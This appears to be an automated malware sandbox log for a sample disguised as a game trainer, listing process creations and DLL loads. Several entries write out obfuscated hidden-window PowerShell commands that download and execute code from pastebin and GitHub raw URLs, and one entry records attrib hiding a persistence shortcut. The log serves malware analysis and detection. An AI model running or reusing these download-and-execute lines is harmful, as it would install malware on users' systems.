Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\xK44OOt7vD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8530.tmp" "c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\xK44OOt7vD.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
